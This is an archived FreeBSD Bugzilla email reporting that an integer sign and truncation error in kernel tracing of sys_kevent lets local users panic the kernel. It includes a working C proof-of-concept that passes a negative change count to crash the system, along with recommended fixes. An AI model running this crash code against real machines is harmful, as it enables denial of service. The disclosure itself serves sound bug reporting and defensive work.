From owner-freebsd-bugs@freebsd.org  Tue Feb 28 20:28:20 2017
Return-Path: <owner-freebsd-bugs@freebsd.org>
Delivered-To: freebsd-bugs@mailman.ysv.freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org
 [IPv6:2001:1900:2254:206a::19:1])
 by mailman.ysv.freebsd.org (Postfix) with ESMTP id E33FACF122C
 for <freebsd-bugs@mailman.ysv.freebsd.org>;
 Tue, 28 Feb 2017 20:28:20 +0000 (UTC)
 (envelope-from bugzilla-noreply@freebsd.org)
Received: from kenobi.freebsd.org (kenobi.freebsd.org
 [IPv6:2001:1900:2254:206a::16:76])
 (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
 (Client did not present a certificate)
 by mx1.freebsd.org (Postfix) with ESMTPS id D2EE4321
 for <freebsd-bugs@FreeBSD.org>; Tue, 28 Feb 2017 20:28:20 +0000 (UTC)
 (envelope-from bugzilla-noreply@freebsd.org)
Received: from bugs.freebsd.org ([127.0.1.118])
 by kenobi.freebsd.org (8.15.2/8.15.2) with ESMTP id v1SKSKoP053294
 for <freebsd-bugs@FreeBSD.org>; Tue, 28 Feb 2017 20:28:20 GMT
 (envelope-from bugzilla-noreply@freebsd.org)
From: bugzilla-noreply@freebsd.org
To: freebsd-bugs@FreeBSD.org
Subject: [Bug 217435] Users can panic the kernel by tracing kevents with
 unusual arguments.
Date: Tue, 28 Feb 2017 20:28:20 +0000
X-Bugzilla-Reason: AssignedTo
X-Bugzilla-Type: new
X-Bugzilla-Watch-Reason: None
X-Bugzilla-Product: Base System
X-Bugzilla-Component: kern
X-Bugzilla-Version: 10.3-RELEASE
X-Bugzilla-Keywords: 
X-Bugzilla-Severity: Affects Many People
X-Bugzilla-Who: tim.newsham@nccgroup.trust
X-Bugzilla-Status: New
X-Bugzilla-Resolution: 
X-Bugzilla-Priority: ---
X-Bugzilla-Assigned-To: freebsd-bugs@FreeBSD.org
X-Bugzilla-Flags: 
X-Bugzilla-Changed-Fields: bug_id short_desc product version rep_platform
 op_sys bug_status bug_severity priority component assigned_to reporter
Message-ID: <bug-217435-8@https.bugs.freebsd.org/bugzilla/>
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
X-Bugzilla-URL: https://bugs.freebsd.org/bugzilla/
Auto-Submitted: auto-generated
MIME-Version: 1.0
X-BeenThere: freebsd-bugs@freebsd.org
X-Mailman-Version: 2.1.23
Precedence: list
List-Id: Bug reports <freebsd-bugs.freebsd.org>
List-Unsubscribe: <https://lists.freebsd.org/mailman/options/freebsd-bugs>,
 <mailto:freebsd-bugs-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-bugs/>
List-Post: <mailto:freebsd-bugs@freebsd.org>
List-Help: <mailto:freebsd-bugs-request@freebsd.org?subject=help>
List-Subscribe: <https://lists.freebsd.org/mailman/listinfo/freebsd-bugs>,
 <mailto:freebsd-bugs-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Tue, 28 Feb 2017 20:28:21 -0000

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D217435

            Bug ID: 217435
           Summary: Users can panic the kernel by tracing kevents with
                    unusual arguments.
           Product: Base System
           Version: 10.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs@FreeBSD.org
          Reporter: tim.newsham@nccgroup.trust

/*
 * keventCrash.c
 *    Crash FreeBSD by tracing kevent with unusual parameters.

Synopsis:
Tracing sys_kevent calls with unusual arguments leads to an overly
large allocation request that leads to a general protection fault.

Description:
sys_kevent tries to trace with this code before doing the syscall:

    if (KTRPOINT(td, KTR_GENIO)) {
        ktriov.iov_base =3D uap->changelist;
        ktriov.iov_len =3D uap->nchanges * sizeof(struct kevent);
        ktruio =3D (struct uio){ .uio_iov =3D &ktriov, .uio_iovcnt =3D 1,
            .uio_segflg =3D UIO_USERSPACE, .uio_rw =3D UIO_READ,
            .uio_td =3D td };
        ktruioin =3D cloneuio(&ktruio);
        ktriov.iov_base =3D uap->eventlist;
        ktriov.iov_len =3D uap->nevents * sizeof(struct kevent);
        ktruioout =3D cloneuio(&ktruio);
    }

and this code after doing the syscall:

    if (ktruioin !=3D NULL) {
        ktruioin->uio_resid =3D uap->nchanges * sizeof(struct kevent);
        ktrgenio(uap->fd, UIO_WRITE, ktruioin, 0);
        ktruioout->uio_resid =3D td->td_retval[0] * sizeof(struct kevent);
        ktrgenio(uap->fd, UIO_READ, ktruioout, error);
    }

here uap->nchanges nad upa->nevents are signed integers,
iov_len is a size_t (unsigned) and uio_resid is a ssize_t (signed).=20=20
Later in ktrgenio an int datalen is computed:

    datalen =3D MIN(uio->uio_resid, ktr_geniosize);
    buf =3D malloc(datalen, M_KTRACE, M_WAITOK);

which truncates uio_resid to 32-bits and allocates from it.
malloc will treat datalen as "unsigned long", sign extending
it to a very large number.  This causes errors in malloc
resulting in a crash.

Recommendation:
Rejected negative values of "nchanges" and "nevents" in sys_kevent.
Make "datalen" an unsigned long in ktrgenio.
Consider rejecting overly large allocation requests in malloc.

 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/event.h>
#include <sys/param.h>
#include <sys/time.h>
#include <sys/uio.h>
#include <sys/ktrace.h>

void xperror(char *msg)
{
    perror(msg);
    exit(1);
}

int main(int argc, char **argv)
{
    char *fn =3D "/tmp/trace";
    struct kevent changes[1] =3D { {0} };
    struct kevent events[1] =3D { {0} };

    if(open(fn, O_RDWR | O_CREAT, 0666) =3D=3D -1)
        xperror(fn);
    if(ktrace(fn, KTRFLAG_DESCEND | KTROP_SET, KTRFAC_GENIO, 0) =3D=3D -1)
        xperror("ktrace");
    if(kevent(0, changes, -1, events, 1, 0) =3D=3D -1)
        xperror("kevent");
    printf("done\n");
    return 0;
}

--=20
You are receiving this mail because:
You are the assignee for the bug.=